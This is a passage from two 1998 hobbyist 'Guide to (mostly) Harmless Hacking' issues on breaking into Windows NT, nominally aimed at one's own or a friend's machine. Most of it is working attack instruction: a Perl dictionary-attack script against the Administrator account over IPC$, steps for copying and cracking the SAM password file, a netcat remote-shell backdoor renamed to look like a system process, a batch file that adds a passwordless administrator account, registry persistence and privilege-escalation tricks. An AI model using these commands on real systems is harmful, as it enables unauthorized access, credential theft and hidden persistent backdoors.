scanner against your own system and found port 139 open. The next step is to run the "nbtstat" command against your own system: c:\>nbtstat -A [ipaddr] NOTE: Make sure you use the capital "A", and the IP address assigned by your ISP when you dial in. To see the IP address that you were assigned, type "ipconfig /all" at the command prompt. This will return the NetBIOS Name Table of your system. The files mentioned above from the Rhino9 site (http://207.89.195.250/texts/) go into more detail regarding what everything in the table refers to, but what we (and the attacker) are interested in are the hex codes in the center column of the table. If you see a code '<20>', this means that your system is advertising that it has shares available. The scary thing is that these shares are potentially avialable via the Internet!! I say "potentially" because we haven't checked yet. Okay, if you haven't seen the '<20>' code, then you can be relatively sure that you are safe, to some degree. Just remember, as long as a computer is turned on, and especially when it's connected to the Internet, there is no such thing as 100% security. If you do see the '<20>' code, then the next step is to gather a little information about our system. To do that, we need to go to: http://www.ntsecurity.com/ and get a copy of the RedButton program. RedButton is a nifty little proof-of-concept program to show that it is possible to log onto an NT system without presenting a username or password. The NTSecurity.com site (http://www.ntsecurity.com/RedButton/default.htm) describes the RedButton program. Run the program against your own system, and see what type of information is available. You will see any available shares, to include any hidden admin shares (ie, shares that end in "$". By default, there are several of these shares available...C$, WINNT$, IPC$, etc). The next step is to attempt to log into your system by using the "net" command. To do this, you need to attempt to connect to the "IPC$" share, which is one of default, hidden shares that is part of the NT installation. Attempting to make this connection is best done from a remote machine, preferably a friend's NT system. Attempt the connection by typing: c:\>net use \\[ipaddr]\ipc$ ******************************************************************** NEWBIE NOTE: The IPC$ share isn't a "share" in the sense that it is a directory, disk or printer. First off, you can see by the "$" that it's an admin share that is created by default when the system is booted. IPC stands for "interprocess communications", and the IPC$ share provides the capability for logging into the system. Remember that...if the sysadmin for the target server has enabled auditing of successful and failed login attempts, then the IPC$ connection attempt will show up in the EventLog. This is true even if you don't successfully log in...it's recorded as a failed login attempt. The concept of the IPC$ share is covered in greater detail in Hobbitt's CIFS file at http://207.98.195.250/texts/cifs.txt and Vacuum's NT Exploits document at http://207.89.195.250/texts/. ******************************************************************** When this connection is attempted, the currently logged on username and password from the local system are sent for authentication. If you are logged on as "Administrator", this may not be a problem, and only password guesses will be required. If you (rather foolishly) use a "null" password (ie, don't use a password at all), then logging in is a trivial matter. You may laugh, but you would be surprised at the number of NT systems that don't have a password for the Administrator account. The 'net' command can also be run using username and password guesses: c:\>net use \\xxx.xxx.xxx.xxx\ipc$ /user: This command will either fail, or be completed successfully...the command will not pause waiting for further input, such as a password. That makes this syntax very easy to add to scripts and batch files. NAT (a program available from http://www.secnet.com) will automate these attempts, based on user-configurable files. NAT can be used in conjunction with dictionary files and wordlists to attack specific user accounts, such as Administrator. If you have changed the name of the Administrator account, as suggested by Microsoft and various professinal security consulting firms, you can still use RedButton to determine what that new name is and attack it. Download a copy of NAT (you can get versions of NAT for 95/NT or Linux) and try running it against either your system or your buddy's system. The downside of NAT is that when given two files, it tries the first username and all of the passwords in the password list, before moving on to the second username. NAT can be configured to some degree but you can also use tools such as Perl to configure this "dictionary attack" to your own tastes. You can create a Perl script that includes the following command: open(IPC, "net use \\xxx.xxx.xxx.xxx\ipc$ /user: | "); ******************************************************************** NEWBIE NOTE: Perl is a great programming language to learn on your way to other languages, such as C or Java. It's an interpretted language, like Java, but much faster than Java. Also, just about every Un*x sysadmin knows how to program in Perl. Fortunately, there is a version of Perl available for 95 and NT at http://www.activestate.com . There is also a wealth of reference material and examples of Perl scripts available from http://www.perl.com. ******************************************************************** The following Perl script can be used to conduct a dictionary attack against your own system or a friend's system (with his permission, of course): ----- begin script ----- # ipcchk.plx by Keydet89 # script to take names from a text file, and attempt to # complete the IPC$ connection using the name as both the # username and password # successful connections are logged to the log file # no checking of arguments is provided, user must enter a # valid IP address for the target server # # usage: c:\>perl ipcchk.plx [ipaddr] open(TEST, "names.txt") || die "Could not open file."; open(LOG,">>ipc.log") || die "Could not open log."; if (length($ARGV[0]) == 0) { print "Usage: perl ipcchk.plx [ipaddr]"; exit(0); } $server = ARGV[0]; while() { $name = $_; chop($name); # print "net use \\\\$server\\ipc\$ /user:Administrator $name | \n"; open(IPC, "net use \\\\$server\\ipc\$ /user:Administrator $name | "); while() { if (grep(/successfully/,$_)) { print LOG "$server accepts connections for password $name\n"; # delete a successful connection to avoid multiple connections to # the same machine open(DEL, "net use \\\\$server\\ipc\$ /d | "); } } ----- end script ----- This script is easily configurable, and can be run on a system with Perl for Win32 installed. For information on installing Perl for Win32 on your 95 or NT system, see: http://reference.perl.com/query.cgi?windows Minor modifications to this script will allow you to conduct a similar attack against other accounts on your system. The IPC$ share is the key to compromising an NT server. It is only following a successful connection that the real work toward exploiting this vulnerability can be done. This is especially true if you've gained access via the Administrator account, or an account in the Administrator group. Once you have successfully completed an IPC$ connection to your buddy's machine, you can then try to see if he has any shares available using the 'net' command: c:\>net view \\[ipaddr] Depending upon how your friend set up his machine, there may or may not be shares available. If shares are available, you can attempt to connect to them using the 'net' command: c:\>net use x: \\[ipaddr]\[share] If this command doesn't work the first time, don't worry. You can follow the same steps as above to attempt a dictionary attack. You shouldn't need to, however...if you gained access to your friend's machine via the Administrator account. But you're not safe just because you haven't specifically made shares available yourself. Even if the C:\ drive itself isn't specifically shared on the server, you still have access to it as the C$ share if the IPC$ connection leads to Administrator access. Once the connection to the IPC$ share is successfully completed, the next command to attempt is: c:\>net use g: \\xxx.xxx.xxx.xxx\c$ ******************************************************************* NEWBIE NOTE: Notice this command is a little different from the earlier version of the "net use" command. In this case, the "c$" share is a physical disk on the target server, so you need to assign it a device name on your local machine. To see the syntax for this command, enter "net use /?" at the command prompt. ******************************************************************* Once you've gained access to the C$ share you, type: c:\>dir g: /p to view the contents of your friend's C:\ drive. If you have successfully completed the IPC$ connection, you can do other things besides access 'hidden' (as in 'not anymore!!') shares. Once your friend creates an account for you and places it in the Administrator group, log in via the IPC$ connection. Then click Start -> Run, and type 'regedit'. Choose Registry -> Connect Network Registry..., and type the IP address of your friend's machine into the dialogue box. Wait a minute, and you will be able to view parts of his Registry. [Password Cracking] If you gain access to the system (I should say 'your' system), then there are several things you can do. Let's say you've gone after /etc/passwd files on Un*x systems...how would you do this on an NT system? NT keeps user passwords in SAM (Security Accounts Manager) file. When a system is turned on, you generally can't access this file, especially if you are a regular user (ie, not Administrator). However, in the c:\winnt\repair directory, you will see a file called "SAM._". This is the compressed version of the SAM database that is created when the system is installed, and updated whenever the rdisk utility is run. Users have the ability to read (and copy) this file. Note: The next exercise is intended to be run on your own machine. However, once you have access to a friend's computer and connected to the C$ share (shown above), you can get a copy of the SAM._ file from his machine by typing: c:\>copy g:\winnt\repair\sam._ So let's have a little fun. First, create several user accounts in User Manager, using blank or easily guessable passwords...words from the dictionary, etc. You can use these accounts to either try breaking into your system, or provide valid accounts to your friends so that only they can log in. After you've created the accounts, have a couple of blank, formatted diskettes available, and type: c:\>rdisk /s Follow the instructions that appear in the windows. When you're done, go to the c:\winnt\repair directory, and copy the "SAM._" file to another directory (for the purposes of this exercise, c:\temp). Now type: c:\temp>expand SAM._ sam Now pass the file through SAMDump (you can find SAMDump at http://www.nmrc.org/files/snt/index.html) in order to put the file in a format that is usable by a password cracker: c:\temp>samdump sam > samfile You now have a usable "samfile". Now you just need to run a password cracker, such as l0phtcrack (from either http://www.l0pht.com or http://www.nmrc.org/files/snt/index.html) or NTCrack (from either http://www.secnet.com or http://www.nmrc.org/files/snt/index.html) Once you gain access to your friend's computer, you can leave little backdoors and practical jokes...if your friend has a sense of humor. Coming next GTMHH: WinNT Back Doors and Practical Jokes! _______________________________________________________________________ Where are those back issues of GTMHHs and Happy Hacker Digests? Check out the official Happy Hacker Web page at http://www.happyhacker.org. We are against computer crime. We support good, old-fashioned hacking of the kind that led to the creation of the Internet and a new era of freedom of information. But we hate computer crime. So don't email us about any crimes you have committed! To subscribe to Happy Hacker and receive the Guides to (mostly) Harmless Hacking, please email hacker@techbroker.com with message "subscribe happy-hacker" in the body of your message. Copyright 1998 keydet89. You may forward, print out or post this GUIDE TO (mostly) HARMLESS HACKING on your Web site as long as you leave this notice at the end. _________________________________________________________ __________________________________________________________ GUIDE TO (mostly) HARMLESS HACKING Vol. 3 No. 10 Part 2 How to Break into Windows NT: Backdoors and Practical Jokes ____________________________________________________________ by keydet89@yahoo.com [Backdoors and Practical Jokes] Creating backdoors is how you can insure your ability to return to the system at will. This is almost a black art when dealing with Un*x systems, and it can also be done on NT. netcat, from Weld Pond, takes advantage of any user's ability to use a local port. netcat is a command-line utility that has several switches used to configure it's operation. This makes netcat, combined with a properly configured command-line launched from a batch file, an excellent choice for a backdoor. (get netcat for NT from http://www.l0pht.com/weld) The batch file needs to contain: nc -L -d -p [port] -t -e cmd.exe L tells netcat to open keep listening after the current session terminates d detach - don't open a DOS window when running (IMPORTANT) p which port to bind to t enable telnet negotiations e command to execute upon connection Copy this command line into a batch file named "runnc.bat" or something similar. Then copy both the netcat executeable file and the batch file to a directory that is in the PATH on the target machine...c:\winnt\system32\ is a good place to hide them. Another little trick to keep in mind is to rename the netcat executable from 'nc.exe' to something innocuous, like 'winlog.exe' (and make sure to make the appropriate changes to the batch file). That way, when you or your buddy opens the TaskList, there won't seem to be any 'unusual' programs running. Run the batch file on your own machine, and open the TaskList (right-click on the TaskBar, and choose TaskList)... Once this batch file is run, all you need to do is connect via telnet, or netcat in client mode: c:\>nc -v [ipaddress of target] [port] So how do you run this batch file? By default, NT doesn't have an interactive telnet server installed so that you can just log in, so what do you do? Well, there is a great little service called the Schedule (or 'AT') service, which lets you schedule programs to be run at a later date. To see if your Schedule service is running, you can either click Control Panel -> Services, and check it, or if you have Perl installed (see above), you can run the following script to see if the service is running, and if not, start it: ----- begin script ----- # atchk.plx # Script checks to see if AT service is running on local # machine...if not, starts it. Minor modifications will # allow you to do the same thing on a remote machine, once # have successfully completed the IPC$ connection and have # Administrator rights. # # usage: perl atchck.plx use Win32::Service; use Win32; my %status; Win32::Service::GetStatus('','Schedule', \%status); die "service is arealdy started\n" if ($status{CurrentState} == 4); Win32::Service::StartService(Win32::NodeName( ),'Schedule') || die "Can't start service\n"; print "Service started\n"; #**Note: This script was modified from: #http://www.inforoute.cgs.fr/leberre1/perlser.htm ----- end script ----- Note: Only Administrators or members of the Administrators group can run the AT command. Once installed, the 'runnc.bat' file can be executed via the AT command. The necessary syntax for the AT command is: AT [\\computername] [time] "command" or more particularly: AT [\\computername] [time] runnc.bat References to commands can be hidden in various places within the registry, set to run when a user logs in: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Note: This last key is where you will find things like AOL's Instant Messenger. The install puts the reference to the app there, but you won't find it in your StartUp box... Here's another little exercise that you should run on your own machine first, and then try copying it over to a friend's machine and running it via the AT command. The batch file below uses commands that are native to NT to create a new user account, then make that user a member of the Administrator group: ----- begin batch file ----- @echo off net user Admin /add /expires:never /passwordreq:no net localgroup "Administrators" /add Admin net localgroup "Users" /del Admin ----- end batch file ----- What are some other neat little tricks to try? Get Netbus from http://netbus.hypermart.net/ . This little program is similar to Back Orifice, and it runs on NT. (Visit the makers of Back Orifice at http://www.cultdeadcow.com/) Okay, so you and your 'leet buddies have played around with each other's machines via the Internet, and pretty much walked through the exercises listed above. Now, what are some local 'attacks' that you can run against your own machine? [Local Attacks] Let's say you have a couple of accounts on your NT box, at least one with Admin rights, and one or two others with user rights. You've already run through the password cracking exercise and seen how easy it is to get the 'SAM._' file and crack it. So what else can you do? Well, you try the 'getadmin' exploit. This exploit consists of a program and .dll file that will add the user to the Administrator group. Get the necessary files from: http://www.nmrc.org/files/nt/index.html The Microsoft site has a hotfix for the "getadmin" exploit, located at: ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/ nt40/hotfixes-postSP3/getadmin-fix/ General information on security problems addressed by Microsoft can be found at: http://www.microsoft.com/security/issues.htm For more information on the 'getadmin' exploit, go to: http://www.ntsecurity.net and search for 'getadmin'. All you need to do to test this exploit is log onto your system via a user account, copy the files into a directory, and run getadmin.exe. Another local exploit similar to the "getadmin" exploit has popped up. The exploit works like this: the user runs a program called "sechole.exe" and the final result (possibly after a reboot) is that the user now has administrator rights! For more information on this and the zipped archive "sechole.zip", go to: http://www.technotronic.com/microsoft.html A variation on this exploit involves the Registry setting the determines what the default debugger (the program run when a user mode program crashes) is run. Usually, the setting is: Hive: HKEY_LOCAL_MACHINE Key: \Software\Microsoft\Windows NT\CurrentVersion\AeDebug Value: Debugger Data Type: REG_SZ Default Value: drwtsn32 -p %ld -e %ld -g The "Everyone" group has the ability to set the value of this key, and is essential how you can exploit it. The debugger runs in the security context of the crashed application, so all you need to do is change the Default Value (via 'regedit') to point to the User Manager, and then crash one of the services that are running. Then you can add accounts to the User Manager...even to the Administrator group. ******************************************************************* NEWBIE NOTE: Before any changes are made to the Registry, make sure that you make a backup of your current Registry using the "rdisk /s" utility. You can make changes to the Registry by clicking Start -> Run, and entering either 'regedit' or 'regedt32'. Before you attempt any of this, read the files pertaining to the Registry from the Rhino9 site (http://207.89.195.250/texts/), the "Hacker's Modern Desk Reference" (http://www.antionline.com/SpecialReports/MHD/) and even "Hardening NT" (http://pw2.netcom.com/~honeyluv/index.html). ******************************************************************* Another local exploit that you can attempt uses the NTFSDOS utility, which is nothing more than a bootable DOS diskette that can read (but not write to) NTFS partitions. This would potentially allow an attacker to make off with copies of systems files, to include the SAM database. The folks at Systems Internals (http://www.sysinternals.com) have not only an NTFSDOS utility available, but also some tools that give the user limited write capability. SysInternals also has NTRecover and NTLocksmith, along with a variety of other useful tools. Get a copy of the utility, and try booting your own system with the diskette in the A:\ drive. There is a nifty little utility available, one that is essentially a Linux boot disk: http://home.eunet.no/~pnordahl/ntpasswd/bootdisk.html The utility comes with rawrite.exe, so that DOS and Windows users can download the utility and create the Linux boot disk. The utility is a NTFS-bootable minimal kernel, with a small program that allows the user to change any password in the SAM database. Alternatively, you can find the Linux binary file (without the rawrite.exe utility) at: http://www.nmrc.org/files/snt/index.html called bootdisk.bin, and according to the description, this is the file you are interested in. You will still need to get a copy of rawrite.exe, in order to write the information to a diskette in a useable form. Carefully read the instructions on the web page for the utility (listed above) and if you are feeling especially '31337', try it out against your own system. [Final Words] By now you should be familiar with some of the methods used to attack and compromise an NT system. Hopefully, you have seen fit to try out the exercises on your own system, or against a friend's system (with permission, of course). And it should start becoming clear what it takes to secure a system from attack. The first step is to become familiar with various exploits by regularly visiting such sites as RootShell (http://www.rootshell.com), the ISS X-Force site (http://www.iss.net/xforce), NTSecurity (http://www.ntsecurity.net), and NTBugTraq (http://www.ntbugtraq.com). Then go to the Microsoft Support (http://support.microsoft.com) and Security (http://www.microsoft.com/security) sites to see what the 'official' fixes are...the NTBugTraq site does a great job of keeping track of the latest hotfixes, and which ones are obsolete. The Microsoft Support site is especially useful, because you can search for information or specific KnowledgeBase articles, and print out those that you find useful. The "Hardening NT" document from Santeria Systems (http://pw2.netcom.com/~honeyluv/index.html) provides an excellent guide for protecting your system, complete with references to the appropriate KnowledgeBase article for each step. Finally, Microsoft maintains a list of security bulletins at: http://www.microsoft.com/security _______________________________________________________________________ Where are those back issues of GTMHHs and Happy Hacker Digests? Check out the official Happy Hacker Web page at http://www.happyhacker.org. We are against computer crime. We support good, old-fashioned hacking of the kind that led to the creation of the Internet and a new era of freedom of information. But we hate computer crime. So don't email us about any crimes you have committed! To subscribe to Happy Hacker and receive the Guides to (mostly) Harmless Hacking, please email hacker@techbroker.com with message "subscribe happy-hacker" in the body of your message. Copyright 1998 keydet89. You may forward, print out or post this GUIDE TO (mostly) HARMLESS HACKING on your Web site as long as you leave this notice at the end. _________________________________________________________